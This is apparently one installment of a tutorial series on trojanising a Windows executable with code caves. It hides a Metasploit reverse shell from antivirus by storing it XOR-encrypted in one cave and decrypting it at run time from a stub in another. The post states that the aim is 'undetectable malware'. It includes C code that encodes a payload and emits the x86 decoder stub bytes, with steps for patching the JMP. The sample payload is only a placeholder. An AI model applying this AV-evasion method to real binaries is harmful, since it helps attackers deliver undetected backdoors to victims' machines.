This method builds on the previous one. A few antivirus engines (only one or two, as far as I know) still detect the previous method by the signature of the shell: since the instructions our payload uses to create the reverse shell were generated by Metasploit's MSFvenom, it is relatively easy for an antivirus vendor to take the bytes of that payload and match them during a scan.
The tactic is as follows: we will use two natural code caves. In one we place a decryption routine, and in the other the shell. The idea is to store the shell encrypted, so that a static analysis (which is what the antivirus does) cannot recognise what that code does. At the point where we divert the program's flow, we jump to the routine, which decrypts the shell at run time, and from there we jump to the shell, now decrypted. Because the routine writes the decrypted bytes back over the cave, the section that holds the shell must be writable.
Since the antivirus does not execute the program, the shell stays undetected by its static scan. Let's go through it step by step.
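As an added illustration of the two-cave layout described above (example code, not from the original post or its author), the following C program XOR-encodes a payload so that its plaintext bytes can no longer be matched by a static signature, and emits the 32-bit x86 decoder stub that the decryption cave would hold. The payload bytes (a NOP sled and a RET), the key 0xAA and the cave addresses 0x00477A00 and 0x00477B00 are constructed placeholders, not the addresses or shell from the series.

```c
/* Added example, not code from the original post: XOR-encode a payload so
 * its bytes no longer match a static AV signature, and emit the 32-bit x86
 * decoder stub that the decryption code cave would hold.  All addresses,
 * the key and the payload bytes are constructed placeholders; the payload
 * is a NOP sled plus RET standing in for the MSFvenom shell, not a real shell. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define STUB_LEN 21u

/* Constructed stand-in for the shell (NOP sled + RET). */
static const uint8_t SAMPLE_PAYLOAD[] = {
    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0xC3
};

/* XOR is its own inverse: the same routine encodes and decodes. */
void xor_crypt(const uint8_t *in, uint8_t *out, size_t len, uint8_t key)
{
    for (size_t i = 0; i < len; i++)
        out[i] = in[i] ^ key;
}

static void put_le32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)v;         p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* Decoder stub placed at stub_addr: decrypts len bytes at shell_addr in
 * place, then jumps there.  Encodings (32-bit x86):
 *   BF imm32      mov edi, shell_addr
 *   B9 imm32      mov ecx, len
 *   80 37 ib      xor byte [edi], key     <- loop top
 *   47            inc edi
 *   E2 FA         loop -6  (back to the xor)
 *   E9 rel32      jmp shell_addr  (rel32 = target - end of this jmp)
 * The section holding shell_addr must be writable, or the xor faults.
 * edi and ecx are clobbered; push/pop them if the host program needs them. */
size_t build_decoder_stub(uint8_t *out, uint32_t stub_addr,
                          uint32_t shell_addr, uint32_t len, uint8_t key)
{
    out[0] = 0xBF; put_le32(out + 1, shell_addr);
    out[5] = 0xB9; put_le32(out + 6, len);
    out[10] = 0x80; out[11] = 0x37; out[12] = key;
    out[13] = 0x47;
    out[14] = 0xE2; out[15] = 0xFA;
    out[16] = 0xE9; put_le32(out + 17, shell_addr - (stub_addr + STUB_LEN));
    return STUB_LEN;
}

/* Naive static scan: does the plaintext pattern occur anywhere in buf? */
int pattern_present(const uint8_t *buf, size_t blen,
                    const uint8_t *pat, size_t plen)
{
    if (plen == 0 || plen > blen) return 0;
    for (size_t i = 0; i + plen <= blen; i++)
        if (memcmp(buf + i, pat, plen) == 0) return 1;
    return 0;
}

/* 1 when the encoded copy hides the pattern AND decoding restores the
 * payload byte for byte; 0 otherwise (e.g. key 0x00 changes nothing). */
int selftest(uint8_t key)
{
    uint8_t enc[sizeof SAMPLE_PAYLOAD], dec[sizeof SAMPLE_PAYLOAD];
    xor_crypt(SAMPLE_PAYLOAD, enc, sizeof SAMPLE_PAYLOAD, key);
    if (pattern_present(enc, sizeof enc, SAMPLE_PAYLOAD, sizeof SAMPLE_PAYLOAD))
        return 0;
    xor_crypt(enc, dec, sizeof enc, key);
    return memcmp(dec, SAMPLE_PAYLOAD, sizeof SAMPLE_PAYLOAD) == 0;
}

static void hexdump(const char *label, const uint8_t *p, size_t n)
{
    printf("%s:", label);
    for (size_t i = 0; i < n; i++) printf(" %02X", p[i]);
    printf("\n");
}

int main(void)
{
    /* Hypothetical cave addresses and key for the example. */
    const uint32_t stub_addr = 0x00477A00u, shell_addr = 0x00477B00u;
    const uint8_t key = 0xAA;
    uint8_t enc[sizeof SAMPLE_PAYLOAD], stub[STUB_LEN];

    xor_crypt(SAMPLE_PAYLOAD, enc, sizeof SAMPLE_PAYLOAD, key);
    build_decoder_stub(stub, stub_addr, shell_addr, sizeof SAMPLE_PAYLOAD, key);
    hexdump("encoded shell (write to the shell cave)  ", enc, sizeof enc);
    hexdump("decoder stub  (write to the decrypt cave)", stub, STUB_LEN);
    printf("selftest: %s\n", selftest(key) ? "ok" : "FAILED");
    return selftest(key) ? 0 : 1;
}
```

The two hex lines are what you would paste into the caves with a hex editor; the JMP that previously went to the shell now goes to the stub, and the stub's final JMP goes to the shell. Two practical notes: a single-byte XOR defeats pattern matching on the file, but an engine that emulates the entry path will see the decrypted bytes, so this buys evasion from static scans only; and encoded bytes may contain 0x00, which is harmless inside a code cave.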
Let's start from the file we modified in the second part of this series; if anything is unclear, I recommend going back to that post. Starting from that file, go to the point where we jump to the code cave and change the JMP so that it goes to the second code cave that cave_miner found for us, in my case at address 00477857:
[…] However, there are still some antivirus programs that detect it. This is because the instructions of the payloads that create a reverse shell are known to some antivirus programs. They are few, but the idea is to make undetectable malware, not slightly detectable malware. I'll fix this in the next post. […]